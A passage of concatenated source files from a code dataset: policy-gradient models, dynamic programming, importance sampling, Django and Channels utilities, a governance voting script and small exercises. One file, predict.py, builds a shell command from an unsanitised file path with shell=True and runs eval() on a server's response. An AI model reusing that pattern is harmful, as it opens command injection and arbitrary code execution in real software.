subject: the subject to exclude\n choices: the choices made\n rewards: the rewards received\n params_init: the initial parameters of the q learning model\n lambda_reg: the regularization parameter\n algo: the optimization algorithm to use\n kwargs: the keyword arguments for the optimization algorithm\n \"\"\"\n assert subject < len(choices), 'subject must be less than number of subjects'\n res = self.fit_all(\n np.concatenate((choices[:subject],choices[subject+1:])),\n np.concatenate((rewards[:subject],rewards[subject+1:])),\n params_init, lambda_reg, algo, **kwargs\n )\n return res\n \n def fit_every_nth(self, start:int, K:int, choices, rewards, params_init, lambda_reg=0, algo='de', **kwargs):\n \"\"\"\n Fit the model to every Kth subject\n start: the starting subject\n K: the number of subjects to skip\n choices: the choices made\n rewards: the rewards received\n params_init: the initial parameters of the q learning model\n lambda_reg: the regularization parameter\n algo: the 
optimization algorithm to use\n kwargs: the keyword arguments for the optimization algorithm\n \"\"\"\n assert start < K, 'start must be less than K'\n choices = choices[start::K]\n rewards = rewards[start::K]\n res = self.fit_all(choices, rewards, params_init, lambda_reg, algo, **kwargs)\n return res\n \n# extend the policy gradient model to include a softmax function\nclass VSPolicyGradient(VLPolicyGradient):\n \"\"\"\n Policy gradient model with softmax function\n \"\"\"\n def __init__(self, eps=1e-6, dx=0.01):\n super().__init__(eps, dx)\n\n def policy(self, params):\n \"\"\"\n Calculate the policy\n params: the parameters of the policy gradient model\n \"\"\"\n # calculate the probability of choosing each action\n params = np.array(params)\n theta_0, theta_1 = params[0], params[1]\n softmax = lambda t0, t1: np.exp(t0)/(np.exp(t0)+np.exp(t1))\n policy = np.array([softmax(theta_0, theta_1), 1-softmax(theta_0, theta_1)])\n policy = np.clip(policy, self.eps, 1-self.eps)\n return policy\n \n def param_props(self):\n \"\"\"\n Return the parameter properties\n names: the names of the parameters\n suggested_bounds: the suggested bounds for the parameters\n suggested_init: the suggested initial values for the parameters\n n_l: the number of learning parameters\n n_p: the number of policy parameters\n \"\"\"\n param_props = {\n 'names': ['alpha', 'theta_0', 'theta_1'],\n 'suggested_bounds': [(0,1),(-10,10),(-10,10)],\n 'suggested_init': [0.5,0.,0.],\n 'n_l': 1, # number of learning parameters\n 'n_p': 2 # number of policy parameters\n }\n return param_props\n \nclass ACLPolicyGradient(VLPolicyGradient):\n \"\"\"\n Actor-critic policy gradient model with logistic policy\n \"\"\"\n def __init__(self, eps=1e-6, dx=0.01,q_type='q'):\n super().__init__(eps, dx)\n assert q_type in ['q','fq','osfq'], 'q_type must be one of q, fq, osfq'\n self.q_type = q_type\n \n def policy_update(self, choice, reward, params):\n \"\"\"\n The policy update function\n params: the parameters of the model\n choice: the choice made\n reward: the reward received\n \"\"\"\n params = np.array(params)\n\n if self.q_type == 'q':\n alpha_p,alpha_q,qs = params[0], params[1], params[2:4]\n elif self.q_type == 'fq':\n alpha_p,alpha_q,alpha_q_forget,qs = params[0], params[1], params[2], params[3:5]\n elif self.q_type == 'osfq':\n alpha_p,alpha_q,alpha_q_forget,kappa,qs = params[0], params[1], params[2], params[3], params[4:6]\n\n new_params = params.copy()\n try:\n new_params[self.param_props()['n_l']:] = params[self.param_props()['n_l']:] + alpha_p*qs[int(choice)]*self.del_log_policy(params[self.param_props()['n_l']:])[:,int(choice)]\n \n if reward != 0:\n qs[int(choice)] = qs[int(choice)] + alpha_q*(reward-qs[int(choice)])\n else:\n if 'os' in self.q_type:\n qs[int(choice)] = qs[int(choice)] + alpha_q*(kappa-qs[int(choice)])\n else:\n qs[int(choice)] = qs[int(choice)] * (1-alpha_q)\n\n if 'f' in self.q_type:\n qs[1-int(choice)] = qs[1-int(choice)]*(1-alpha_q_forget)\n \n if self.q_type == 'q':\n new_params[2:4] = qs.copy()\n elif self.q_type == 'fq':\n new_params[3:5] = qs.copy()\n elif self.q_type == 'osfq':\n new_params[4:6] = qs.copy()\n except:\n pass\n return new_params\n \n def policy_gradient_learning(self, choices, rewards, params):\n \"\"\"\n The policy gradient learning function\n params: the parameters of the model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n policy_params = np.zeros((len(choices)+1,len(params[self.param_props()['n_l']:])))\n policy_params[0] = params[self.param_props()['n_l']:]\n new_params = params.copy()\n for n, (choice, reward) in enumerate(zip(choices, rewards)):\n new_params = self.policy_update(choice, reward, new_params)\n policy_params[n+1] = new_params[self.param_props()['n_l']:]\n return policy_params\n \n def param_props(self):\n \"\"\"\n Return the parameter properties\n names: the names of the parameters\n suggested_bounds: the suggested bounds for the parameters\n suggested_init: the suggested initial values for the parameters\n n_p: the number of policy parameters\n \"\"\"\n param_props = {\n 'names': ['alpha_policy', 'alpha_Q_value'] + ([] if self.q_type == 'q' else ['alpha_Q_forget'] if self.q_type == 'fq' else ['alpha_Q_forget','kappa']) +\n ['Q_0', 'Q_1','theta'],\n 'suggested_bounds': [(0,1),(0,1)]+ ([] if self.q_type == 'q' else [(0,1)] if self.q_type == 'fq' else [(0,1),(0,1)]) +\n [(0,1),(0,1),(-10,10)],\n 'suggested_init': [0.5,0.5] + ([] if self.q_type == 'q' else [0.5] if self.q_type == 'fq' else [0.5,0.5]) + \n [0.,0.,0.],\n 'n_l': 4 if self.q_type == 'q' else 5 if self.q_type == 'fq' else 6, # number of learning parameters\n 'n_p': 1 # number of policy parameters\n }\n return param_props\n\nclass AdvLPolicyGradient(VLPolicyGradient):\n \"\"\"\n Advantage learning policy gradient model with logistic policy\n \"\"\"\n def __init__(self, eps=1e-6, dx=0.01):\n super().__init__(eps, dx)\n \n def policy_update(self, choice, reward, params):\n \"\"\"\n The policy update function\n params: the parameters of the model\n choice: the choice made\n reward: the reward received\n \"\"\"\n params = np.array(params)\n alpha_p,alpha_v,v = params[0], params[1], params[2]\n new_params = params.copy()\n try:\n new_params[self.param_props()['n_l']:] = params[self.param_props()['n_l']:] + alpha_p*(reward-v)*self.del_log_policy(params[self.param_props()['n_l']:])[:,int(choice)]\n v = v + alpha_v*(reward-v)\n new_params[2] = v\n except:\n pass\n return new_params\n \n def policy_gradient_learning(self, choices, rewards, params):\n \"\"\"\n The policy gradient learning function\n params: the parameters of the model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n policy_params = np.zeros((len(choices)+1,len(params[self.param_props()['n_l']:])))\n policy_params[0] = params[self.param_props()['n_l']:]\n new_params = params.copy()\n for n, (choice, reward) in enumerate(zip(choices, rewards)):\n new_params = self.policy_update(choice, reward, new_params)\n policy_params[n+1] = new_params[self.param_props()['n_l']:]\n return policy_params\n \n def param_props(self):\n \"\"\"\n Return the parameter properties\n names: the names of the parameters\n suggested_bounds: the suggested bounds for the parameters\n suggested_init: the suggested initial values for the parameters\n n_p: the number of policy parameters\n \"\"\"\n param_props = {\n 'names': ['alpha_policy', 'alpha_value', 'V','theta'],\n 'suggested_bounds': [(0,1),(0,1),(0,1),(-10,10)],\n 'suggested_init': [0.5,0.5,0.0,0.0],\n 'n_l': 3, # number of learning parameters\n 'n_p': 1 # number of policy parameters\n }\n return param_props","repo_name":"neurorishika/HetGOQL","sub_path":"pygorl/cogpolicy.py","file_name":"cogpolicy.py","file_ext":"py","file_size_in_byte":20174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
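# Aside: the Baek 2293 record that follows counts coin combinations with the classic
# unbounded-knapsack recurrence dp[j] += dp[j - coin]. A minimal self-contained sketch
# of the same idea; the coin values and target amount here are illustrative only.
def count_combinations(coins, k):
    # dp[j] = number of ways to form amount j with the coins seen so far
    dp = [0] * (k + 1)
    dp[0] = 1  # one way to make 0: take no coins
    for coin in coins:
        for j in range(coin, k + 1):
            dp[j] += dp[j - coin]  # extend every way of making j-coin by one more coin
    return dp[k]

assert count_combinations([1, 2, 5], 10) == 10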
+{"seq_id":"3585372801","text":"# 2022/09/25 Baek 2293\n\nINF = int(1e9)\nn, k = map(int, input().split())\nary = []\n\nfor _ in range(n):\n ary.append(int(input()))\n\ndp = [0] * (k + 1)\ndp[0] = 1\nfor i in range(len(ary)):\n for j in range(ary[i], k + 1):\n dp[j] += dp[j - ary[i]] \n\nprint(dp[-1])","repo_name":"kkw2758/Algorithm","sub_path":"DP/baek_2293.py","file_name":"baek_2293.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70793282361","text":"from typing import List\nfrom typing import Optional\nfrom typing import Union\n\nimport torch\nfrom tqdm import tqdm\n\nimport hmc\nimport utils\n\n\n@torch.no_grad()\ndef ais_trajectory(\n model,\n loader,\n forward: bool,\n schedule: Union[torch.Tensor, List],\n n_sample: Optional[int] = 100,\n initial_step_size: Optional[int] = 0.01,\n device: Optional[torch.device] = None,\n):\n \"\"\"Compute annealed importance sampling trajectories for a batch of data.\n\n Could be used for *both* forward and reverse chain in BDMC.\n\n Args:\n model (vae.VAE): VAE model\n loader (iterator): iterator that returns pairs, with first component\n being `x`, second would be `z` or label (will not be used)\n forward: indicate forward/backward chain\n schedule: temperature schedule, i.e. `p(z)p(x|z)^t`\n n_sample: number of importance samples\n device: device to run all computation on\n initial_step_size: initial step size for leap-frog integration;\n the actual step size is adapted online based on accept-reject ratios\n\n Returns:\n a list where each element is a torch.Tensor that contains the\n log importance weights for a single batch of data\n \"\"\"\n\n def log_f_i(z, data, t, log_likelihood_fn=utils.log_bernoulli):\n \"\"\"Unnormalized density for intermediate distribution `f_i`:\n f_i = p(z)^(1-t) p(x,z)^(t) = p(z) p(x|z)^t\n => log f_i = log p(z) + t * log p(x|z)\n \"\"\"\n zeros = torch.zeros_like(z)\n log_prior = utils.log_normal(z, zeros, zeros)\n log_likelihood = log_likelihood_fn(model.decode(z), data)\n\n return log_prior + log_likelihood.mul_(t)\n\n logws = []\n for i, (batch, post_z) in enumerate(loader):\n B = batch.size(0) * n_sample\n batch = batch.to(device)\n batch = utils.safe_repeat(batch, n_sample)\n\n epsilon = torch.full(size=(B,), device=device, fill_value=initial_step_size)\n accept_hist = torch.zeros(size=(B,), device=device)\n logw = torch.zeros(size=(B,), device=device)\n\n # initial sample of z\n if forward:\n current_z = torch.randn(size=(B, model.latent_dim), device=device)\n else:\n current_z = utils.safe_repeat(post_z, n_sample).to(device)\n\n for j, (t0, t1) in tqdm(enumerate(zip(schedule[:-1], schedule[1:]), 1)):\n # update log importance weight\n log_int_1 = log_f_i(current_z, batch, t0)\n log_int_2 = log_f_i(current_z, batch, t1)\n logw += log_int_2 - log_int_1\n\n def U(z):\n return -log_f_i(z, batch, t1)\n\n @torch.enable_grad()\n def grad_U(z):\n z = z.clone().requires_grad_(True)\n grad, = torch.autograd.grad(U(z).sum(), z)\n max_ = B * model.latent_dim * 100.\n grad = torch.clamp(grad, -max_, max_)\n return grad\n\n def normalized_kinetic(v):\n zeros = torch.zeros_like(v)\n return -utils.log_normal(v, zeros, zeros)\n\n # resample velocity\n current_v = torch.randn_like(current_z)\n z, v = hmc.hmc_trajectory(current_z, current_v, grad_U, epsilon)\n current_z, epsilon, accept_hist = hmc.accept_reject(\n current_z,\n current_v,\n z,\n v,\n epsilon,\n accept_hist,\n j,\n U=U,\n K=normalized_kinetic,\n )\n\n logw = 
-logw\n logws.append(logw)\n print('Last batch stats %.4f' % (logw.mean().cpu().item()))\n\n return logws\n","repo_name":"lxuechen/BDMC","sub_path":"ais.py","file_name":"ais.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"40"} +{"seq_id":"19434067327","text":"from unittest import TestCase\nfrom relative_ranks import Solution\n\n\nclass TestSolution(TestCase):\n def test_find_relative_ranks(self):\n s = Solution()\n data = [10, 3, 8, 9, 4]\n x = s.findRelativeRanks(data)\n self.assertEqual(['Gold Medal', '5', 'Bronze Medal', 'Silver Medal', '4'], x)\n","repo_name":"plocinskipiotr/my_leetcode","sub_path":"problems/easy/relative_ranks/test_relative_ranks.py","file_name":"test_relative_ranks.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10509123540","text":"# p.339\n# 2021-08-17\n# https://www.acmicpc.net/problem/18352\n\n# 입력\n# 4 4 2 1\n# 1 2\n# 1 3\n# 2 3\n# 2 4\n\nfrom collections import deque\n\nn, m, k, x = map(int, input().split())\ngraph = [[] for _ in range(n+1)]\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\nvisited = [-1] * (n+1)\ndef bfs(graph, start, visited, k):\n # 큐(Queue) 구현을 위해 deque 라이브러리 사용\n queue = deque([start])\n # 현재 노드를 방문 처리\n visited[start] = 0\n # 큐가 빌 때까지 반복\n while queue:\n # 큐에서 하나의 원소를 뽑아 출력\n v = queue.popleft()\n for i in graph[v]:\n if visited[i] == -1:\n visited[i] = visited[v] + 1\n queue.append(i)\n result = 0\n\n for i in range(1, n+1):\n if k == visited[i]:\n print(i)\n result += 1\n if result == 0:\n print(-1)\n\nbfs(graph, x, visited, k)","repo_name":"yunyezl/algoitzman","sub_path":"cheongha/DFS&BFS/특정거리의도시찾기.py","file_name":"특정거리의도시찾기.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"15607531499","text":"import subprocess\n\n\ndef classify(image_path: str) -> dict:\n # curl -X POST -F image=@now.jpg 'http://localhost:5000/predict_3level'\n api_url = \"http://localhost:5000/predict\"\n command_format = \"curl -X POST -F 'image=@{}' '{}'\"\n p = command_format.format(image_path, api_url)\n result = subprocess.check_output(p, shell=True)\n text = result.decode('utf-8')\n text = text.replace('true', 'True')\n text = text.replace('false', 'False')\n result_dict = eval(text)\n return result_dict\n","repo_name":"OheyaObeya/OheyaObeyaGUIDemo","sub_path":"scripts/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36639858859","text":"import os\nfrom io import StringIO\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.core.management import call_command\n\n\nclass Command(BaseCommand):\n help = 'create a bunch of json file out of dumpdata in the desired order'\n TABLES = [\n 'auth.group',\n 'auth.user',\n 'impresso.profile',\n 'impresso.collection',\n 'impresso.collectableItem'\n ]\n\n def prompt_env(self, default=\"yes\"):\n dotenv_filename = '.{0}.env'.format(os.environ.get('ENV', '')) if 'ENV' in os.environ else '.env'\n self.stdout.write('syncing data using env file: {0}'.format(dotenv_filename))\n question = 'Continue using this env file? Type \"y\" to continue... 
'\n\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n self.stdout.write(question + prompt)\n choice = input().lower().strip()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n self.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\n\n def create_fixture(self, app_name, filename):\n buf = StringIO()\n self.stdout.write('create fixture for app: %s in %s' % (app_name, filename))\n call_command('dumpdata', app_name, stdout=buf)\n buf.seek(0)\n with open(filename, 'w') as f:\n f.write(buf.read())\n\n def handle(self, *args, **options):\n self.prompt_env()\n\n for t in Command.TABLES:\n self.stdout.write('dumping table: %s' % t)\n self.create_fixture(t, '{0}.json'.format(t))\n","repo_name":"impresso/impresso-user-admin","sub_path":"impresso/management/commands/customdumpdata.py","file_name":"customdumpdata.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32066549357","text":"from . import views\r\nfrom django.urls import path\r\n\r\nurlpatterns = [\r\n path('',views.home,name='home'),\r\n path('register/',views.register,name='register'),\r\n path('login/',views.login,name='login'),\r\n path('info/',views.info,name='info'),\r\n path('logout/',views.logout,name='logout'),\r\n path('contact/',views.contact,name='contact'),\r\n path('generate/',views.generate,name='generate')\r\n]","repo_name":"truptipatil04/MP1-TimeTableGenerator","sub_path":"TimeTableGenerator/TimeTableGenerator/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38481739435","text":"''' Write a Python program to get a list, sorted in increasing order by the last element in each tuple from a given list of non-empty tuples.\nSample List : [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]\nExpected Result : [(2, 1), (1, 2), (2, 3), (4, 4), (2, 5)]'''\n\na=[]\nl=int(input(\"How many pairs\"))\nfor i in range(l):\n\ta.append([])\n\tfor j in range(2):\n\t\tele=int(input())\n\t\ta[i].append(ele)\n\na.sort(key=lambda pair: pair[-1])\nprint(a)","repo_name":"Sasikumar-s/Python-files","sub_path":"List/6-sorted in increasing order by the last element in each tuple from a given list of non-empty tuples.py","file_name":"6-sorted in increasing order by the last element in each tuple from a given list of non-empty tuples.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
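# Aside: the exercise record above asks for tuples sorted in increasing order by their
# last element; a minimal sketch of the same task using sorted() with a key function.
# The sample data mirrors the record's docstring; nothing beyond it is assumed.
pairs = [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]
# key=lambda t: t[-1] compares tuples by their final element only
assert sorted(pairs, key=lambda t: t[-1]) == [(2, 1), (1, 2), (2, 3), (4, 4), (2, 5)]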
+{"seq_id":"41353421966","text":"from typing import NamedTuple, List, Dict\nfrom utils import lido, log\nfrom utils.config import prompt_bool\nfrom utils.evm_script import encode_call_script\n\nfrom brownie import (Contract, EasyTrack)\n\nclass FactoryToAdd(NamedTuple):\n factory: Contract\n permissions: str\n\nclass FactoryToRemove(NamedTuple):\n factory: Contract\n\ndef create_voting_on_new_factories(\n easy_track: EasyTrack,\n factories_to_add: List[FactoryToAdd],\n factories_to_remove: List[FactoryToRemove],\n network: str,\n tx_params: Dict[str, str]\n) -> int:\n factories_evm_script: str = encode_call_script(\n [\n (\n easy_track.address,\n easy_track.removeEVMScriptFactory.encode_input(\n elem.factory\n )\n )\n for elem in factories_to_remove\n ] +\n [\n (\n easy_track.address,\n easy_track.addEVMScriptFactory.encode_input(\n elem.factory,\n elem.permissions\n )\n )\n for elem in factories_to_add\n ]\n )\n\n description: str = 'Omnibus vote:'\n item_id: int = 1\n for elem in factories_to_remove:\n description += f'{item_id}) Remove {elem.factory} factory;'\n item_id = item_id + 1\n\n for elem in factories_to_add:\n description += f'{item_id}) Add {elem.factory} factory;'\n item_id = item_id + 1\n description = description[:-1] + '.'\n\n print(description.replace(';', '\\n'))\n\n print(\"Proceed to create vote? [yes/no]: \")\n\n if not prompt_bool():\n log.nb(\"Aborting\")\n return -1\n\n vote_id, _ = lido.create_voting(\n evm_script=factories_evm_script,\n description=description,\n network=network,\n tx_params=tx_params,\n )\n return vote_id\n","repo_name":"lidofinance/easy-track","sub_path":"utils/vote_for_new_factories.py","file_name":"vote_for_new_factories.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"26621720424","text":"from urllib.parse import urlparse\n\nfrom django.conf import settings\nfrom django.http.request import validate_host\n\nfrom ..generic.websocket import AsyncWebsocketConsumer\n\n\nclass OriginValidator:\n \"\"\"\n Validates that the incoming connection has an Origin header that\n is in an allowed list.\n \"\"\"\n\n def __init__(self, application, allowed_origins):\n self.application = application\n self.allowed_origins = allowed_origins\n\n def __call__(self, scope):\n # Make sure the scope is of type websocket\n if scope[\"type\"] != \"websocket\":\n raise ValueError(\"You cannot use OriginValidator on a non-WebSocket connection\")\n # Extract the Origin header\n origin_host = None\n for header_name, header_value in scope.get(\"headers\", []):\n if header_name == b\"origin\":\n print(\"got origin header, val %r\" % header_value)\n try:\n origin_host = urlparse(header_value.decode(\"ascii\")).hostname\n print(\"nuhost: %r\" % origin_host)\n except UnicodeDecodeError:\n pass\n else:\n print(\"non origin header: %r\" % header_name)\n # Check to see if the origin header is valid\n print(\"origin header: %s\" % origin_host)\n if self.valid_origin(origin_host):\n # Pass control to the application\n return self.application(scope)\n else:\n # Deny the connection\n return WebsocketDenier(scope)\n\n def valid_origin(self, origin):\n # None is not allowed\n if origin is None:\n return False\n # Check against our list\n return validate_host(origin, self.allowed_origins)\n\n\ndef AllowedHostsOriginValidator(application):\n \"\"\"\n Factory function which returns an OriginValidator configured to use\n settings.ALLOWED_HOSTS.\n \"\"\"\n allowed_hosts = settings.ALLOWED_HOSTS\n if settings.DEBUG and not allowed_hosts:\n allowed_hosts = [\"localhost\", \"127.0.0.1\", \"[::1]\"]\n return OriginValidator(application, allowed_hosts)\n\n\nclass WebsocketDenier(AsyncWebsocketConsumer):\n \"\"\"\n Simple application which denies all requests to it.\n \"\"\"\n\n async def connect(self):\n await self.close()\n","repo_name":"ianbrown112/django-channels","sub_path":"venv/lib/python3.5/site-packages/channels/security/websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21693019028","text":"def solution(cookie):\n if len(cookie) == 1:\n return 0\n if len(cookie) == 2:\n if cookie[0] != cookie[1]:\n return 0\n else:\n return cookie[1]\n\n coosum = [0] * len(cookie)\n coosum[0] = cookie[0]\n for i in range(1, len(cookie)):\n coosum[i] += coosum[i-1] + cookie[i]\n \n answer = -1\n maxcookie = coosum[-1] //2 if coosum[-1] %2 == 0 else (coosum[-1]-1)//2\n for l in range(len(cookie)):\n for r in range(l+1, len(cookie)):\n # 토탈이 짝수이면 바구니 단위로 똑같이 나눌 수 있는지 봐야함\n total = coosum[r] - coosum[l] + cookie[l]\n if total % 2 == 1:\n continue\n\n for i in range(r-1, l-1, -1):\n if coosum[r] - coosum[i] > total //2:\n break\n if (coosum[r] - coosum[i]) == total//2:\n answer = max(answer, total//2)\n if maxcookie == answer:\n return answer\n break\n \n if answer == -1:\n return 0\n else: return answer \n","repo_name":"thing-zoo/algorithm-study","sub_path":"PGS/seeun/연습문제/쿠키 구입.py","file_name":"쿠키 구입.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30346714065","text":"\"\"\"\nhttps://leetcode.com/problems/longest-common-prefix/\n\"\"\"\n\nclass Solution(object):\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n longest_prefix=\"\"\n\n \n # base case\n if strs is None or len(strs) == 0:\n return longest_prefix\n \n if len(strs) == 1:\n return strs[0]\n \n \n first_word = strs[0]\n \n for i in range(0, len(first_word) + 1):\n prefix = first_word[0:i]\n should_update_longest = True\n \n for other_word in strs[1:]:\n if other_word[0:i] != prefix:\n should_update_longest= False\n break\n \n if should_update_longest == True:\n longest_prefix = prefix\n else:\n break\n \n return longest_prefix","repo_name":"trung1704ptit/LeetCode","sub_path":"Prefix/14-longest-common-prefix.py","file_name":"14-longest-common-prefix.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18038796606","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('OECD_Health_systems.csv')\ndf = df[['Country_Region', 'Health_exp_per_capita_USD_2016', 'Health_exp_pct_GDP_2016']].dropna()\ndf = df.sort_values('Health_exp_per_capita_USD_2016', ascending=True)\n\nx = df['Health_exp_per_capita_USD_2016']\ny = df['Country_Region']\nz = df['Health_exp_pct_GDP_2016']\nfont = {'fontname': 'Arial Rounded MT Bold', 'color': '#326479'}\ncolors = [\n \"#ff3662\",\n \"#ff747c\",\n \"#6a0004\",\n \"#a3000a\",\n \"#d9690d\",\n \"#441814\",\n \"#ffb4a1\",\n \"#5b372b\",\n \"#934700\",\n \"#ff9f57\",\n \"#633c00\",\n \"#ebc147\",\n \"#d8bf00\",\n \"#c9ce1e\",\n \"#405a00\",\n \"#bccc97\",\n \"#59e131\",\n \"#007e2c\",\n \"#01d766\",\n \"#72db92\",\n \"#006b57\",\n \"#00ac9a\",\n \"#018eae\",\n \"#94ceed\",\n \"#00436b\",\n \"#80bdff\",\n \"#739fff\",\n \"#0050a1\",\n \"#0250d4\",\n \"#000d93\",\n \"#9969ff\",\n \"#d1abff\",\n \"#7300be\",\n \"#880071\",\n \"#ff25ce\",\n \"#ff81c5\",\n \"#ce0085\"]\n\nfig, ax = plt.subplots(figsize=(16, 9))\n\nplt.barh(y, x, color=colors, alpha=0.8)\nfor i, (v1, v2) in enumerate(zip(x, z)):\n plt.text(v1 + 25, i, f'{v1:,.0f} ({v2}%)', va='center', alpha=0.9, **font)\n\nax.set_facecolor('#daedf4')\nax.set_xticklabels([f'{int(x):,}' for x in ax.get_xticks().tolist()])\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.tick_params(axis='y', left=False, pad=0)\n\nplt.title('Healthcare Expenditures by OECD Countries in 2016', **font, fontsize=20)\nplt.xlabel('Expenditures per Capita in USD (% of GDP in Parentheses)', **font, fontsize=15)\nplt.xticks(**font, fontsize=12)\nplt.yticks(**font, fontsize=12)\nplt.margins(x=0.08, y=0.01)\nplt.tight_layout()\nplt.savefig('Healthcare_Expenditures_by_OECD_Countries_graph.png', dpi=300)\nplt.show()\n","repo_name":"henryli-git/Data_Visualization","sub_path":"Healthcare_Expenditures/Healthcare_Expenditures_by_OECD_Countries.py","file_name":"Healthcare_Expenditures_by_OECD_Countries.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
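# Aside: the Cesar.py record below builds its Caesar-shift table from a dict mapping
# both directions; an equivalent minimal sketch using modular indexing over an
# alphabet list. The 4-letter alphabet here is illustrative only.
def shift(ch, d, alphabet):
    if ch not in alphabet:
        return ch  # characters outside the alphabet pass through unchanged
    return alphabet[(alphabet.index(ch) + d) % len(alphabet)]

assert shift('a', 3, ['a', 'b', 'c', 'd']) == 'd'
assert shift('d', 1, ['a', 'b', 'c', 'd']) == 'a'  # wraps around via the modulo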
+{"seq_id":"37129433482","text":"import sys\nfrom tkinter import *\n\nalfabeto=\" a b c d e f g h i j k l m n ñ o p q r s t u v w x y z á é í ó ú\"\nnumeros=\" 0 1 2 3 4 5 6 7 8 9\"\nalfabeto=alfabeto+alfabeto.upper()+numeros\nalfabeto=alfabeto.split()\ntam=len(alfabeto)\nencrip=\"\"\ndic={}\ny=0\nresultado=\"\"\nfor x in alfabeto:\n dic[y]=x\n dic[x]=y\n y=y+1\nd=0\n\ndef Desencriptar():\n T2.delete(1.0, END) \n try:\n d = int(desplazamiento.get())\n y = T1.get(1.0, END)\n resultado=\"\"\n for x in y:\n if x in dic:\n resultado=resultado+dic[(dic[x]-d)%tam]\n else:\n resultado=resultado+x\n etiqueta2.config(text=\"Texto desencriptado\")\n T2.insert(END, resultado)\n except ValueError:\n resultado=\"\"\n T2.delete(1.0, END)\n\ndef Encriptar():\n T2.delete(1.0, END)\n try:\n d = int(desplazamiento.get())\n y = T1.get(1.0, END)\n resultado=\"\"\n for x in y:\n if x in dic:\n resultado=resultado+dic[(dic[x]+d)%tam]\n else:\n resultado=resultado+x\n etiqueta2.config(text=\"Texto encriptado\")\n T2.insert(END, resultado)\n except ValueError:\n resultado=\"\"\n T2.delete(1.0, END)\n\napp = Tk()\napp.title(\"Cifrado César\")\n\nvp = Frame(app, relief=\"raised\")\nvp.grid(column=0, row=0, padx=(25,25), pady=(10,10), sticky=(N, S, E, W))\nvp.columnconfigure(0, weight=3)\nvp.rowconfigure(0, weight=1)\n \nscrollbar = Scrollbar(vp) \n\netiqueta1 = Label(vp, text=\"Ingresar texto\")\netiqueta1.grid(column=1, row=1, columnspan=3, sticky=(N,S,E,W)) \n\nT1 = Text(vp, height=10, width=30)\nT1.config(bd=5, yscrollcommand=scrollbar)\nT1.grid(column=1, row=2, columnspan=3, sticky=(E, W))\nT1.columnconfigure(0, weight=3)\nT1.rowconfigure(0, weight=1)\n\netiqueta2 = Label(vp, text=\"Resultado\")\netiqueta2.grid(column=1, row=3, columnspan=3, sticky=(N,S,E,W))\n\nT2 = Text(vp, height=10, width=30)\nT2.config(bd=5, yscrollcommand=scrollbar)\nT2.grid(column=1, row=4, columnspan=3, sticky=(E, W))\nT2.columnconfigure(0, weight=3)\nT2.rowconfigure(0, weight=1)\n\nboton1 = Button(vp, text=\"Encriptar\", command=Encriptar)\nboton1.grid(column=1, row=5)\n \nboton2 = Button(vp, text=\"Desencriptar\", command=Desencriptar)\nboton2.grid(column=2, row=5)\n\ndesplazamiento = Entry(vp,width=10, textvariable=d)\ndesplazamiento.grid(column=3, row=5)\ndesplazamiento.columnconfigure(0, weight=1)\ndesplazamiento.rowconfigure(0, weight=1)\n\napp.mainloop()\n","repo_name":"roggervalf/Python","sub_path":"Cesar.py","file_name":"Cesar.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17433592264","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam, lr_scheduler\n\n# from unet import UNet\nfrom swin_unet import UNet_emb #UNet\nfrom utils import *\nimport torchvision\nimport os\nimport json\n\n\nclass dehamer(object):\n \"\"\"Implementation of dehamer from Guo et al. 
